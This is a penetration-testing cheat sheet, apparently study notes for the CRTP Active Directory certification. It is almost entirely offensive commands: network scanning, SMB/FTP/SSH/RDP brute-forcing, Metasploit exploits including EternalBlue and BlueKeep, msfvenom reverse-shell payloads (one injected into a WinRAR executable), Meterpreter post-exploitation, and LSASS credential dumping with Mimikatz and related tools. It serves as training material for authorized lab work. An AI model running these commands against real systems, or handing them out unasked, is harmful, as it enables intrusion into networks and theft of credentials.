# CRTP Cheat Sheet ## Networking **Routing** ```bash # Linux ip route # Windows route print # Mac OS X / Linux netstat -r ``` **IP** ```bash # Linux ip a ip -br -c a # Windows ipconfig /all # Mac OS X / Linux ifconfig ``` **ARP** ```bash # Linux ip neighbour # Windows arp -a # Mac OS X / Linux arp ``` **Ports** ```bash # Linux netstat -tunp netstat -tulpn ss -tnl # Windows netstat -ano # Mac OS X / Linux netstat -p tcp -p udp lsof -n -i4TCP -i4UDP ``` **Connect and Scan** ```bash nc -v example.com 80 openssl s_client -connect : openssl s_client -connect : -debug openssl s_client -connect : -state openssl s_client -connect : -quiet # Scan port nc -zv ``` ## Information Gathering **Passive** ```bash host whatweb whois whois dnsrecon -d wafw00f -l wafw00f -a sublist3r -d theHarvester -d theHarvester -d -b all ``` **Google Dorks** ```bash site: inurl: site:*.sitename.com intitle: filetype: intitle:index of cache: inurl:auth_user_file.txt inurl:passwd.txt inurl:wp-config.bak ``` **DNS** ```bash sudo nano /etc/hosts dnsenum # e.g. dnsenum zonetransfer.me dig dig axfr @DNS-server-name fierce --domain ``` **Host Discovery** ```bash ## Ping scan sudo nmap -sn ## ARP scan netdiscover -i eth1 -r # NMAP PORT SCAN nmap ## Skip ping nmap -Pn ## Host discovery + saving into file nmap -sn / > hosts.txt nmap -sn -T4 / -oG - | awk '/Up$/{print $2}' ## Scan all ports nmap -p- ## Open ports scan + saving into file nmap -Pn -sV -T4 -A -oN ports.txt -p- -iL hosts.txt --open ## Port 80 only scan nmap -p 80 ## Custom list of ports scan nmap -p 80,445,3389,8080 ## Custom ports range scan nmap -p1-2000 ## Fast mode & verbose scan nmap -F -v ## UDP scan nmap -sU ## Service scan nmap -sV ## Service + O.S. detection scan sudo nmap -sV -O ## Default Scripts scan nmap -sC nmap -Pn -F -sV -O -sC ## Aggressive scan nmap -Pn -F -A ## Timing (T0=slow ... T5=insanely fast) scan nmap -Pn -F -T5 -sV -O -sC -v ## Output scan nmap -Pn -F -oN outputfile.txt nmap -Pn -F -oX outputfile.xml ## Output to all formats nmap -Pn -sV -sC -O -oA outputfile nmap -Pn -sV -sC -O -oA outputfile nmap -A -oA outputfile ``` ## Footprinting & Scanning **Network Discovery** ```bash sudo arp-scan -I eth1 ping sudo nmap -sn tracert google.com #Windows traceroute google.com #Linux ## fping fping -I eth1 -g -a ## fping with no "Host Unreachable errors" fping -I eth1 -g -a fping -I eth1 -g -a 2>/dev/null ``` ## Enumeration #### **Nmap** ```bash sudo nmap -p 445 -sV -sC -O nmap -sU --top-ports 25 --open nmap -p 445 --script smb-protocols nmap -p 445 --script smb-security-mode nmap -p 445 --script smb-enum-sessions nmap -p 445 --script smb-enum-sessions --script-args smbusername=,smbpassword= nmap -p 445 --script smb-enum-shares nmap -p 445 --script smb-enum-shares --script-args smbusername=,smbpassword= nmap -p 445 --script smb-enum-users --script-args smbusername=,smbpassword= nmap -p 445 --script smb-server-stats --script-args smbusername=,smbpassword= nmap -p 445 --script smb-enum-domains--script-args smbusername=,smbpassword= nmap -p 445 --script smb-enum-groups--script-args smbusername=,smbpassword= nmap -p 445 --script smb-enum-services --script-args smbusername=,smbpassword= nmap -p 445 --script smb-enum-shares,smb-ls --script-args smbusername=,smbpassword= nmap -p 445 --script smb-os-discovery nmap -p445 --script=smb-vuln-* ``` #### **Nmblookup** 
nmblookup -A <TARGET_IP>
### **User Enumeration** #### **Kerbrute** ```bash kerbrute userenum -d DC.LOCAL --dc 192.168.1.1 usernames.txt -o valid_ad_users.txt #Extract valid usernames from results: cat valid_ad_users.txt | awk -F "VALID USERNAME:\t" '{print $2}' | tr -d ' ' | sed '/^$/d' | awk -F '@' '{print $1}' | tee users.txt #Checking for Passwords Matching Usernames Some users may have their username as their password: kerbrute bruteuser -d DC.LOCAL -dc 192.168.1.1 usernames.txt passwords.txt ``` #### PowerView * Find all machines on the current domain where the current user has local admin access ```powershell Find-LocalAdminAccess -Verbose ``` * Find computers where a domain admin (or specified user/group) has sessions: ```powershell Find-DomainUserLocation -Verbose Find-DomainUserLocation -UserGroupIdentity "RDPUsers" ``` #### [Invoke Session Hunter](https://github.com/Leo4j/InvokeSessionHunter) * List sessions on remote machines Users ```powershell . C:\AD\Tools\Invoke-SessionHunter.ps1 Invoke-SessionHunter -FailSafe Invoke-SessionHunter -NoPortScan -RawResults | select Hostname,UserSession,Access ``` ### **Domain Enumeration** **PowerView** 
##PowerView.ps1
#Get Domain Information, Retrieves information about the current domain.
Get-NetDomain

#Enumerate Domain Controllers
Get-NetDomainController

#Lists all Domain Controllers in the current domain, List Domain Users
Get-NetUser

#Displays all users in the domain, along with detailed attributes, Find High-Value Targets
Get-NetUser -AdminCount 1

#Lists all users flagged as administrators, Enumerate Domain Groups
Get-NetGroup

#Retrieves all domain groups. Lists members of the "Domain Admins" group.
Get-NetGroupMember -GroupName "Domain Admins"

#Locate Domain Computers. Lists all computers in the domain.
Get-NetComputer

#Analyze Trust Relationships. Displays trust relationships between domains.
Get-NetDomainTrust

#Check ACLs on AD Objects. Shows ACLs for a specific user account, resolving GUIDs to human-readable names.
Get-ObjectAcl -SamAccountName "Administrator" -ResolveGUIDs

#Find Shares on Domain Computers. Locates shared folders across domain computers.
Invoke-ShareFinder

#Identify Delegation Configurations. Finds user accounts with Service Principal Names (SPNs), often used in Kerberos-based attacks.
Get-NetUser -SPN

#-------------------------------------------
#Enumerate ACL/ACE using PowerView

#Get the ACLs associated with the specified object
Get-DomainObjectAcl -SamAccountName student1 -ResolveGUIDs

#Get the ACLs associated with the specified prefix to be used for search
Get-DomainObjectAcl -SearchBase "LDAP://CN=DomainAdmins,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local" -ResolveGUIDs -Verbose

#Get the ACLs associated for Domain Admins
Get-DomainObjectAcl -Identity "Domain Admins" -ResolveGUIDs -Verbose

#Analyze Trust Relationships (Displays trust relationships between domains)
Get-NetDomainTrust

#Check ACLs on AD Objects  (Shows ACLs for a specific user account, resolving GUIDs to human-readable names)
Get-ObjectAcl -SamAccountName "Administrator" -ResolveGUIDs

#Search for interesting ACEs
Find-InterestingDomainAcl -ResolveGUIDs

#Get ACLs where studentx has interesting permissions
Find-InterestingDomainAcl -ResolveGUIDs | ?{$_.IdentityReferenceName -match "student867"}

#Get the ACLs associated with the specified path
Get-PathAcl -Path "\\dcorp-dc.dollarcorp.moneycorp.local\sysvol"

#-------------------------------------------
#GPO Enumeration
#Get list of GPO in current domain
Get-DomainGPO
Get-DomainGPO | select displayname
Get-DomainGPO -ComputerIdentity dcorp-student1

#Get GPOs which use Restricted Groups or groups.xml for interesting users
Get-DomainGPOLocalGroup

#Get users which are in a local group of a machine using GPO
Get-DomainGPOComputerLocalGroupMapping -ComputerIdentity dcorp-student1

#Get machines where the given user is member of a specific group
Get-DomainGPOUserLocalGroupMapping -Identity student1 -Verbose

#Get OUs in a domain
Get-DomainOU
Get-ADOrganizationalUnit -Filter * -Properties *

#List all the computers in the DevOps OU
(Get-DomainOU -Identity DevOps).distinguishedname | %{Get-DomainComputer -SearchBase $_} | select name

#Get GPO applied on an OU, read GPOname from gplink attribute from Get-NetOU
Get-DomainGPO -Identity "{0D1CC23D-1F20-4EEE...........}"
#Enumerate GPO applied on the DevOps OU
#To enumerate GPO applied on the DevOps OU, we need the name of the policy from the gplink attribute from the OU:
(Get-DomainOU -Identity DevOps).gplink
[LDAP://cn={0BF8D01C-1F62-4BDC-958C-57140B67D147},cn=policies,cn=system,DC=dollarcorp,DC=moneycorp,DC=local;0]
#Copy the value between {} including the brackets as well:  {0BF8D01C-1F62-4BDC-958C-57140B67D147}
Get-DomainGPO -Identity '{0BF8D01C-1F62-4BDC-958C-57140B67D147}'
#Or Enumerate GPO for DevOps OU in a unique command
Get-DomainGPO -Identity (Get-DomainOU -Identity DevOps).gplink.substring(11,(Get-DomainOU -Identity DevOps).gplink.length-72)

###Domain Trust Enumeration
##To enumerate domain trusts:
#List all domain trusts for the current domain
Get-DomainTrust
#List trusts for a specific domain
Get-DomainTrust -Domain us.dollarcorp.moneycorp.local
#Using Active Directory module
Get-ADTrust
Get-ADTrust -Identity us.dollarcorp.moneycorp.local
#List external trusts in the current forest
Get-DomainTrust | ?{$_.TrustAttributes -eq "FILTER_SIDS"}

##Forest Enumeration
#To map information about the forest:
#Get details about the current forest
Get-Forest
Get-Forest -Forest eurocorp.local
#Using Active Directory module
Get-ADForest
Get-ADForest -Identity eurocorp.local
#Retrieve all domains in the current forest:
Get-ForestDomain
Get-ForestDomain -Forest eurocorp.local
(Get-ADForest).Domains
#Retrieve all global catalogs for the forest:
Get-ForestGlobalCatalog
Get-ForestGlobalCatalog -Forest eurocorp.local
Get-ADForest | Select-Object -ExpandProperty GlobalCatalogs
#Map forest trust relationships (if any exist):
Get-ForestTrust
Get-ForestTrust -Forest eurocorp.local
#Alternative using Active Directory module
Get-ADTrust -Filter 'msDS-TrustForestTrustInfo -ne "$null"'
#### BloodHound 
apt-get install bloodhound
neo4j console

#open browser and go to URL indicated by neo4j console (usually: 
http://localhost:7474

#SharpHound
Import-Module .\SharpHound.ps1
Invoke-BloodHound -CollectionMethod All
.\SharpHound.exe -c all

#Download the resulting .zip file and upload it to BloodHound for analysis.
### **SMB** [**SMB Enumeration and Common attacks**](https://dev-angelist.gitbook.io/writeups-and-walkthroughs/homemade-labs/active-directory/smb-common-attacks) **SMBMap** ```bash smbmap -u guest -p "" -d . -H smbmap -u -p '' -d . -H ## Run a command smbmap -u -p '' -H -x 'ipconfig' ## List all drives smbmap -u -p '' -H -L ## List dir content smbmap -u -p '' -H -r 'C$' ## Upload a file smbmap -u -p '' -H --upload '/root/sample_backdoor' 'C$\sample_backdoor' ## Download a file smbmap -u -p '' -H --download 'C$\flag.txt' smbmap -H corp-dc #List share with anonymous access smbmap -H corp-dc -u "devan" -p "P@ssword123!" #List Devan's shares smbmap -H corp-dc -u "devan" --prompt ##List Devan's shares without writing password in cleartext #List a specific Share smbmap -H corp-dc -u "devan" --prompt -r "SharedFiles" #Check OS Version and signing status smbmap -H corp-dc -u "devan" --prompt -v #OS version check smbmap -H corp-dc -u "devan" --prompt --signing #Signing check ``` #### **SMB Connection** ```bash # Connection smbclient -L -N smbclient -L -U smbclient /// -U smbclient ///admin -U admin smbclient ///public -N #NULL Session ## SMBCLIENT smbclient ///share_name help ls get #Lab smbclient -L //corp-dc -N #Anonymous Login (-N no credentials) smbclient //corp-dc -U "dev-angelist.lab/devan%P@ssword123!" #List Devan's shares smbclient //corp-dc/SharedFiles -U devan smbclient //corp-dc/SharedFiles -U "dev-angelist.lab/devan%P@ssword123!" #we can get file shared using get command #File system prompt includes command such as: cd, dir, ls, get, put ``` #### **Netexec** 1. **Enumerate Domain Machines for SMB Signing** ```bash nxc smb 192.168.1.0/24 ``` 2. **Validate Credentials** ```bash nxc smb 192.168.1.1 -u 'jdoe' -p 'Password123' ``` 3. **Find Valid Machines for Connection** ```bash nxc smb 192.168.1.0/24 -u 'jdoe' -p 'Password123' ``` 4. **Enumerate Shared Resources** ```bash nxc smb 192.168.1.1 -u 'jdoe' -p 'Password123' --shares ``` 5. **Enumerate Users and Groups** ```bash nxc smb 192.168.1.1 -u 'jdoe' -p 'Password123' --users nxc smb 192.168.1.1 -u 'jdoe' -p 'Password123' --groups ``` 6. **Dump LSA and NTDS** If you have domain admin privileges: ```bash nxc smb 192.168.1.1 -u 'jdoe' -p 'Password123' --lsa nxc smb 192.168.1.1 -u 'jdoe' -p 'Password123' --ntds ``` *** #### PowerHuntShares ```powershell Import-Module C:\AD\Tools\PowerHuntShares.psm1 Invoke-HuntSMBShares -NoPing -OutputDirectory C:\AD\Tools -HostList C:\AD\Tools\servers.txt ``` #### **RPCClient** ```bash rpcclient -U "" -N ## RPCCLIENT enumdomusers enumdomgroups lookupnames admin ``` #### **Enum4Linux** ```bash enum4linux -o enum4linux -U enum4linux -S enum4linux -G enum4linux -i enum4linux -r -u "" -p "" enum4linux -a -u "" -p "" enum4linux -U -M -S -P -G ## NULL SESSIONS # 1 - Use “enum4linux -n” to make sure if “<20>” exists: enum4linux -n # 2 - If “<20>” exists, it means Null Session could be exploited. Utilize the following command to get more details: enum4linux # 3 - If confirmed that Null Session exists, you can remotely list all share of the target: smbclient -L WORKGROUP -I -N -U "" # 4 - You also can connect the remote server by applying the following command: smbclient \\\\\\c$ -N -U "" # 5 - Download those files stored on the share drive: smb: \> get file_shared.txt ``` #### **Hydra** ```bash gzip -d /usr/share/wordlists/rockyou.txt.gz hydra -l admin -P /usr/share/wordlists/rockyou.txt smb ``` We can use a wordlist generator tools (how [Cewl](https://app.gitbook.com/s/iS3hadq7jVFgSa8k5wRA/practical-ethical-hacker-notes/tools/cewl)), to create custom wordlists. #### **Metasploit** ```bash # METASPLOIT Starting msfconsole msfconsole -q # METASPLOIT SMB use auxiliary/scanner/smb/smb_version use auxiliary/scanner/smb/smb_enumusers use auxiliary/scanner/smb/smb_enumshares use auxiliary/scanner/smb/smb_login use auxiliary/scanner/smb/pipe_auditor ## set options depends on the selected module set PASS_FILE /usr/share/wordlists/metasploit/unix_passwords.txt set SMBUser set RHOSTS exploit ``` ### **FTP** #### **Nmap** ``` sudo nmap -p 21 -sV -sC -O nmap -p 21 -sV -O nmap -p 21 --script ftp-anon nmap -p 21 --script ftp-brute --script-args userdb= ``` #### **Ftp Client** ``` ftp ls cd /../.. get put ``` #### **Hydra** ``` hydra -L /usr/share/metasploit-framework/data/wordlists/common_users.txt -P /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt -t 4 ftp ``` ### **SSH** #### **Nmap** ```bash # NMAP sudo nmap -p 22 -sV -sC -O nmap -p 22 --script ssh2-enum-algos nmap -p 22 --script ssh-hostkey --script-args ssh_hostkey=full nmap -p 22 --script ssh-auth-methods --script-args="ssh.user=" nmap -p 22 --script=ssh-run --script-args="ssh-run.cmd=cat /home/student/FLAG, ssh-run.username=, ssh-run.password=" nmap -p 22 --script=ssh-brute --script-args userdb= ``` #### **Netcat** ```bash # NETCAT nc nc 22 ``` #### **SSH** ```bash ssh @ 22 ssh root@ 22 ``` #### **Hydra** ```bash hydra -l -P /usr/share/wordlists/rockyou.txt ssh ``` #### **Metasploit** ```bash use auxiliary/scanner/ssh/ssh_login set RHOSTS set USERPASS_FILE /usr/share/wordlists/metasploit/root_userpass.txt set STOP_ON_SUCCESS true set VERBOSE true exploit ``` ### **HTTP** #### **Nmap** ```bash sudo nmap -p 80 -sV -O nmap -p 80 --script=http-enum -sV nmap -p 80 --script=http-headers -sV nmap -p 80 --script=http-methods --script-args http-methods.url-path=/webdav/ nmap -p 80 --script=http-webdav-scan --script-args http-methods.url-path=/webdav/ ``` #### **Alternative** ```bash whatweb http browsh --startup-url http:// dirb http:// dirb http:// /usr/share/metasploit-framework/data/wordlists/directory.txt hydra -L users.txt -P /usr/share/wordlists/rockyou.txt example.com http-head /admin/ #brute http basic auth hydra -L users.txt -P /usr/share/wordlists/rockyou.txt example.com http-get /admin/ #brute http digest hydra -l admin -P /usr/share/wordlists/rockyou.txt example.com https-post-form "/login.php:username=^USER^&password=^PASS^&login=Login:Not allowed" # brute http post form hydra -l admin -P /usr/share/wordlists/rockyou.txt example.com https-post-form "/login.php:username=^USER^&password=^PASS^&login=Login:Not allowed:H=Cookie\: PHPSESSID=if0kg4ss785kmov8bqlbusva3v" #brute http authenticated post form wget curl | more curl -I http:/// curl --digest -u : http:/// lynx ``` #### **Metasploit** ```bash use auxiliary/scanner/http/brute_dirs use auxiliary/scanner/http/robots_txt use auxiliary/scanner/http/http_header use auxiliary/scanner/http/http_login use auxiliary/scanner/http/http_version # Global set setg RHOSTS setg RHOST ## set options depends on the selected module set HTTP_METHOD GET set TARGETURI // set USER_FILE set PASS_FILE /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt set VERBOSE false set AUTH_URI // exploit ``` ### **SQL** #### **Nmap** ```bash sudo nmap -p 3306 -sV -O nmap -p 3306 --script=mysql-empty-password nmap -p 3306 --script=mysql-info nmap -p 3306 --script=mysql-users --script-args="mysqluser='',mysqlpass=''" nmap -p 3306 --script=mysql-databases --script-args="mysqluser='',mysqlpass=''" nmap -p 3306 --script=mysql-variables --script-args="mysqluser='',mysqlpass=''" nmap -p 3306 --script=mysql-audit --script-args="mysql-audit.username='',mysql-audit.password='',mysql-audit.filename=''" nmap -p 3306 --script=mysql-dump-hashes --script-args="username='',password=''" nmap -p 3306 --script=mysql-query --script-args="query='select count(*) from .;',username='',password=''" nmap -sV -p 3306 --script mysql-audit,mysql-databases,mysql-dump-hashes,mysql-empty-password,mysql-enum,mysql-info,mysql-query,mysql-users,mysql-variables,mysql-vuln-cve2012-2122 10.10.10.13 ## Microsoft SQL nmap -sV -sC -p 1433 nmap -p 1433 --script ms-sql-info nmap -p 1433 --script ms-sql-ntlm-info --script-args mssql.instance-port=1433 nmap -p 1433 --script ms-sql-empty-password nmap -p 3306 --script ms-sql-brute --script-args userdb=/root/Desktop/wordlist/common_users.txt,passdb=/root/Desktop/wordlist/100-common-passwords.txt nmap -p 3306 --script ms-sql-query --script-args mssql.username=,mssql.password=,ms-sql-query.query="SELECT * FROM master..syslogins" -oN output.txt nmap -p 3306 --script ms-sql-dump-hashes --script-args mssql.username=,mssql.password= nmap -p 3306 --script ms-sql-xp-cmdshell --script-args mssql.username=,mssql.password=,ms-sql-xp-cmdshell.cmd="ipconfig" nmap -p 3306 --script ms-sql-xp-cmdshell --script-args mssql.username=,mssql.password=,ms-sql-xp-cmdshell.cmd="type c:\flag.txt" ``` ```bash # MYSQL mysql -h -u mysql -h -u root # Mysql client help show databases; use ; select count(*) from ; select load_file("/etc/shadow"); ``` #### **Hydra** ```bash hydra -l -P /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt mysql ``` #### **Metasploit** ```bash use auxiliary/scanner/mysql/mysql_schemadump use auxiliary/scanner/mysql/mysql_writable_dirs use auxiliary/scanner/mysql/mysql_file_enum use auxiliary/scanner/mysql/mysql_hashdump use auxiliary/scanner/mysql/mysql_login ## MS Sql use auxiliary/scanner/mssql/mssql_login use auxiliary/admin/mssql/mssql_enum use auxiliary/admin/mssql/mssql_enum_sql_logins use auxiliary/admin/mssql/mssql_exec use auxiliary/admin/mssql/mssql_enum_domain_accounts # Global set setg RHOSTS setg RHOST ## set options depends on the selected module set USERNAME root set PASSWORD "" set DIR_LIST /usr/share/metasploit-framework/data/wordlists/directory.txt set VERBOSE false set PASSWORD "" set FILE_LIST /usr/share/metasploit-framework/data/wordlists/sensitive_files.txt set PASSWORD "" set USER_FILE /root/Desktop/wordlist/common_users.txt set PASS_FILE /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt set VERBOSE false set STOP_ON_SUCCESS true set CMD whoami exploit ``` ### **SMTP** #### **Nmap** ```bash sudo nmap -p 25 -sV -sC -O nmap -sV -script banner ``` ```bash nc 25 telnet 25 # TELNET client - check supported capabilities HELO attacker.xyz EHLO attacker.xyz ``` ```bash smtp-user-enum -U /usr/share/commix/src/txt/usernames.txt -t ``` #### **Metasploit** ```bash # METASPLOIT service postgresql start && msfconsole -q # Global set setg RHOSTS setg RHOST use auxiliary/scanner/smtp/smtp_enum ``` ## **Windows Exploitation** ### **IIS WebDav / FTP** ```bash davtest -url davtest -auth : -url http:///webdav cadaver [OPTIONS] nmap -p 80 --script http-enum -sV ``` ```bash msfvenom -p LHOST= LPORT= -f > shell.asp msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f asp > shell.asp ``` ```bash hydra -L /usr/share/wordlists/metasploit/common_users.txt -P /usr/share/wordlists/metasploit/common_passwords.txt http-get /webdav/ ``` ```bash ## METASPLOIT # Global set setg RHOSTS setg RHOST use exploit/multi/handler use exploit/windows/iis/iis_webdav_upload_asp set payload windows/meterpreter/reverse_tcp set LHOST set LPORT set HttpUsername set HttpPassword set PATH /webdav/metasploit.asp ``` ```bash # Targeting IIS/FTP nmap -sV -sC -p21,80 ## Try anonymous:anonymous ftp ## Brute-force FTP hydra -L /usr/share/wordlists/metasploit/unix_users.txt -P /usr/share/wordlists/metasploit/unix_passwords.txt ftp hydra -l administrator -P /usr/share/wordlists/metasploit/unix_users.txt ftp -I hydra -l -P /usr/share/wordlists/metasploit/unix_users.txt ftp -I ## Generate an .asp reverse shell payload cd / ip -br -c a msfvenom -p windows/shell/reverse_tcp LHOST= LPORT= -f asp > shell.aspx ## FTP Login with ftp put shell.aspx ## msfconsole use multi/handler set payload windows/shell/reverse_tcp set LHOST set LPORT ## Open http:///shell.aspx . A reverse shell may be received. ``` **OPENSSH** ```bash # Targeting OPENSSH nmap -sV -sC -p 22 searchsploit OpenSSH 7.1 ## Brute-force SSH hydra -l administrator /usr/share/wordlists/metasploit/unix_users.txt ssh hydra -l -P /usr/share/wordlists/metasploit/unix_users.txt ssh ## SSH Login with ssh @ ## Win bash net localgroup administrators whoami /priv # msfconsole use auxiliary/scanner/ssh/ssh_login setg RHOST setg RHOSTS set USERNAME set PASSWORD run session 1 # CTRL+Z to background sessions -u 1 ``` **SMB** ```bash # Targeting SMB nmap -sV -sC -p 445 nmap --script smb-vuln-ms17-010 -p 445 ## Brute-force SMB hydra -l administrator -P /usr/share/wordlists/metasploit/unix_passwords.txt smb hydra -l -P /usr/share/wordlists/metasploit/unix_passwords.txt smb ## Enumeration smbclient -L -U smbmap -u -p -H enum4linux -u -p -U ## msfconsole use auxiliary/scanner/smb/smb_enumusers set RHOSTS set SMBUser set SMBPass run ## SMB Login with locate psexec.py cp /usr/share/doc/python3-impacket/examples/psexec.py . chmod +x psexec.py python3 psexec.py Administrator@ python3 psexec.py @ # msfconsole - Meterpreter use exploit/windows/smb/psexec set RHOSTS set SMBUser Administrator set SMBPass set payload windows/x64/meterpreter/reverse_tcp run # Without :, exploit a vulnerability, e.g. EternalBlue use exploit/windows/smb/ms17_010_eternalblue set RHOSTS run # Other modules use auxiliary/scanner/smb/smb_login use exploit/windows/smb/psexec use exploit/windows/smb/ms17_010_eternalblue set USER_FILE /usr/share/metasploit-framework/data/wordlists/common_users.txt set PASS_FILE /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt set VERBOSE false ## Manual Exploit - AutoBlue cd mkdir tools cd /home/kali/tools sudo git clone https://github.com/3ndG4me/AutoBlue-MS17-010.git cd AutoBlue-MS17-010 pip install -r requirements.txt cd shellcode chmod +x shell_prep.sh ./shell_prep.sh # LHOST = Host Kali Linux IP # LPORT = Port Kali will listen for the reverse shell nc -nvlp 1234 # On attacker VM cd .. chmod +x eternalblue_exploit7.py python eternalblue_exploit7.py shellcode/sc_x64.bin ``` **MYSQL** ```bash # Targeting MYSQL (Wordpress) nmap -sV -sC -p 3306,8585 searchsploit MySQL 5.5 ## Brute-force MySql - msfconsole msfconsole -q use auxiliary/scanner/mysql/mysql_login set RHOSTS set PASS_FILE /usr/share/wordlists/metasploit/unix_passwords.txt run ## MYSQL Login with mysql -u root -p -h show databases; use ; show tables; select * from ; ## msfconsole use exploit/windows/smb/ms17_010_eternalblue set RHOSTS run sysinfo cd / cd wamp dir cd www\\wordpress cat wp-config.php shell ``` #### **SMB** #### **RDP** ```bash # RDP nmap -sV ``` ```bash ## METASPLOIT # Global set setg RHOSTS setg RHOST use auxiliary/scanner/rdp/rdp_scanner use auxiliary/scanner/rdp/cve_2019_0708_bluekeep set RPORT # ! Kernel crash may be caused ! use exploit/windows/rdp/cve_2019_0708_bluekeep_rce show targets set target set GROOMSIZE 50 ``` ```bash hydra -L /usr/share/metasploit-framework/data/wordlists/common_users.txt -P /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt rdp:// -s ``` ```bash xfreerdp /u: /p: /v:: xfreerdp /u: /p: /v:: /w:1920 /h:1080 /fonts /smart-sizing ``` ### **WinRM** ```bash # WINRM crackmapexec [OPTIONS] evil-winrm -i -u -p nmap --top-ports 7000 nmap -sV -p 5985 ``` ```bash crackmapexec winrm -u -p /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt crackmapexec winrm -u -p -x "whoami" crackmapexec winrm -u -p -x "systeminfo" ``` ```bash # Command Shell evil-winrm.rb -u -p '' -i ``` ```bash ## METASPLOIT # WinRM search type:auxiliary winrm use auxiliary/scanner/winrm/winrm_auth_methods # Brute force WinRM login search winrm_login use auxiliary/scanner/winrm/winrm_login set USER_FILE /usr/share/metasploit-framework/data/wordlists/common_users.txt set PASS_FILE /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt # Launch command search winrm_cmd use auxiliary/scanner/winrm/winrm_cmd set USERNAME set PASSWORD set CMD whoami search winrm_script use exploit/windows/winrm/winrm_script_exec set USERNAME set PASSWORD set FORCE_VBS true ``` ### **Payloads** **MSFVenom shells** ```bash msfvenom --list payloads msfvenom --list formats msfvenom --list encoders # Win 32bit msfvenom -a x86 -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f exe > .exe # Win 64bit msfvenom -a x64 -p windows/x64/meterpreter/reverse_tcp LHOST= LPORT= -f exe > .exe # Linux 32bit msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST= LPORT= -f elf > # Linux 64bit msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST= LPORT= -f elf > # Win 32bit + shikata_ga_nai encoded msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -e x86/shikata_ga_nai -f exe > .exe # Use more encoding iterations msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -i 10 -e x86/shikata_ga_nai -f exe > .exe # Linux 32bit + shikata_ga_nai encoded msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST= LPORT= -i 10 -e x86/shikata_ga_nai -f elf > # Inject into Portable Executables msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -e x86/shikata_ga_nai -i 10 -f exe -x winrar-x32-621.exe > winrar.exe # JSP Java Meterpreter Reverse TCP msfvenom -p java/jsp_shell_reverse_tcp LHOST= LPORT= -f raw > shell.jsp #TomCat content management system # PHP msfvenom -p php/meterpreter_reverse_tcp LHOST= LPORT= -f raw > shell.php\ #PHP Web Application cat shell.php | pbcopy && echo ' shell.php && pbpaste >> shell.php ``` **MSF Staged and Non Staged Payload** ```bash # MSF STAGED Payload windows/x64/meterpreter/reverse_tcp # MSF NON-STAGED Payload windows/x64/meterpreter_reverse_https ``` ```bash # Upload the payload on the target and try it with MSFconsole cd Payloads sudo python -m http.server 8080 msfconsole -q use multi/handler set payload set LHOST set LPORT run ``` ```bash # Automation ls -lah /usr/share/metasploit-framework/scripts/resource # Create a handler resource nano handler.rc # Insert the following lines use multi/handler set payload windows/meterpreter/reverse_tcp set LHOST set LPORT run # Save it and exit msfconsole -q -r handler.rc # msfconsole resource handler.rc # Export inserted msfconsole commands into a resource script makerc .rc ``` ## **Windows Post-Exploitation** ```bash # METERPRETER run post/windows/manage/migrate migrate #more quickly ## Pivoting portfwd add -l -p -r ``` ```bash # Manual SHELL TO METERPRETER background # or CTRL+Z sessions search shell_to_meterpreter use post/multi/manage/shell_to_meterpreter set SESSION 1 set LHOST run sessions sessions 2 # Auto SHELL TO METERPRETER sessions -u 1 sessions 3 ``` ### **File system discovery** 
dir /b/s "\*.conf\*"
dir /b/s "\*.txt\*"
dir /b/s "\*filename\*"
cd         #it's the same as 'pwd' command in linux
type       #it's the same as 'cat' command in linux
systeminfo         #information about the Operating System

# Check Users
cat /etc/passwd   #Users in linux  
List drives on the machine

fsutil fsinfo drives     #Check Drives

# MSF Meterpreter
getuid
sysinfo
show_mount
cat C:\\Windows\\System32\\eula.txt
getprivs
pgrep explorer.exe
migrate <PROCESS_ID>

# Win CMD - run 'shell' in Meterpreter
## System
hostname
systeminfo
wmic qfe get Caption,Description,HotFixID,InstalledOn

## Users
whoami
whoami /priv
query user
net users
net user <USER>
net localgroup
net localgroup Administrators
net localgroup "Remote Desktop Users"

## Network
ipconfig
ipconfig /all
route print
arp -a
netstat -ano
netsh firewall show state
netsh advfirewall show allprofiles

## Services
ps
net start
wmic service list brief
tasklist /SVC
schtasks /query /fo LIST
schtasks /query /fo LIST /v

# Metasploit
use post/windows/gather/enum_logged_on_users
use post/windows/gather/win_privs
use post/windows/gather/enum_logged_on_users
use post/windows/gather/checkvm
use post/windows/gather/enum_applications
use post/windows/gather/enum_computers
use post/windows/gather/enum_patches
use post/windows/gather/enum_shares

# JAWS - Automatic Local Enumeration - Powershell
powershell.exe -ExecutionPolicy Bypass -File .\jaws-enum.ps1 -OutputFilename Jaws-Enum.txt
### **HTTP/HFS** ```bash # Meterpreter sysinfo getuid getsystem getuid getprivs hashdump show_mount ps migrate # msfconsole use post/windows/manage/migrate use post/windows/gather/win_privs #CHECK UAC/Privileges use post/windows/gather/enum_logged_on_users use post/windows/gather/checkvm use post/windows/gather/enum_applications use post/windows/gather/enum_av_excluded use post/windows/gather/enum_computers use post/windows/gather/enum_patches use post/windows/gather/enum_shares use post/windows/manage/enable_rdp set SESSION 1 loot ``` ### **Dump Hashes** 
#Extracting Credentials from LSASS
#Mimikatz
#To dump credentials from LSASS on a local machine using Invoke-Mimikatz
Invoke-Mimikatz -Command "sekurlsa::ekeys"

#SafetyKatz
#SafetyKatz is a minidump-based approach combined with PELoader to execute Mimikatz
SafetyKatz.exe "sekurlsa::ekeys"

#SharpKatz
#SharpKatz is a C# implementation of certain Mimikatz functionalities:
SharpKatz.exe --Command ekeys

#Dumpert (Direct System Calls & API Unhooking)
#Dumpert evades traditional monitoring by leveraging direct system calls:
rundll32.exe C:\Dumpert\Outflank-Dumpert.dll,Dump

#Pypykatz (Python-based Mimikatz Alternative). For extracting credentials using Python
pypykatz.exe live lsa

#Comsvcs.dll for LSASS Dump. A built-in Windows DLL can be leveraged to dump LSASS memory:
tasklist /FI "IMAGENAME eq lsass.exe"
